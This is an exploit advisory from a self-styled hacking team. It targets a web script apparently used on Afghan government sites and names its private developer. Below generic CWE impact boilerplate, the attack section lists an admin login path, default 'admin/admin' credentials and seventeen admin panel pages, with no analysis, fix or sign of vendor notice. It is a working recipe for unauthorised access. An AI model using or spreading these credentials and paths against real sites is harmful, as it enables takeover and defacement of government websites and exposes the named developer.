####################################################################
# Exploit Title : Obaidullah Sulaimankhil Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 03/03/2019
# Vendor Homepage / Social Media : facebook.com/obaidullah.sulaimankhil
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type :
CWE-287 [ Improper Authentication ]
CWE-592 [ Authentication Bypass Issues ]
CWE-305 [ Authentication Bypass by Primary Weakness ]
CWE-288 [ Authentication Bypass Using an Alternate Path or Channel ]
CWE-302 [ Authentication Bypass by Assumed-Immutable Data ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Information about Software and Owner :
************************************
Obaidullah SulaimanKhil who is web developer in Afghanhistan and developed
a script with his name Obaidullah Software for Afghani Government Websites.
####################################################################
# Impact :
**********
* When an actor claims to have a given identity, the software does not prove or insufficiently
proves that the claim is correct.
* The authentication algorithm is sound, but the implemented mechanism can be bypassed
as the result of a separate weakness that is primary to the authentication error.
* This product requires authentication, but the product has an alternate path or
channel that does not require authentication.
* The authentication scheme or implementation uses key data elements that are assumed
to be immutable, but can be controlled or modified by the attacker.
####################################################################
# Authentication Bypass Exploit :
*****************************
Admin Panel Login Path :
***********************
/Pages/AdminLogin.aspx
Admin username : admin
Admin password : admin
Usable Admin Control Panel Links :
********************************
/Pages/frmWelcomeMessageAdmin.aspx
/Pages/HistoryOfDMTVETAdmin.aspx
/Pages/AboutDMTVETAdmin.aspx
/Pages/HEDMAdmin.aspx
/Pages/frmStaffAdmin.aspx
/Pages/frmCeoMessageAdmin.aspx
/Pages/frmSliderAdmin.aspx
/Pages/frmDMTVETStructureAdmin.aspx
/Pages/frmDMTVETReport.aspx
/Pages/frmArticlesAdmin.aspx
/Pages/frmVisionAdmin.aspx
/Pages/frmPresentationsAdmin.aspx
/Pages/frmInterviewsAdmin.aspx
/Pages/frmAlbumAdmin.aspx
/Pages/frmNewsAdmin.aspx
/Pages/frmOthersAdmin.aspx
/Pages/frmContactUsAdmin.aspx
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################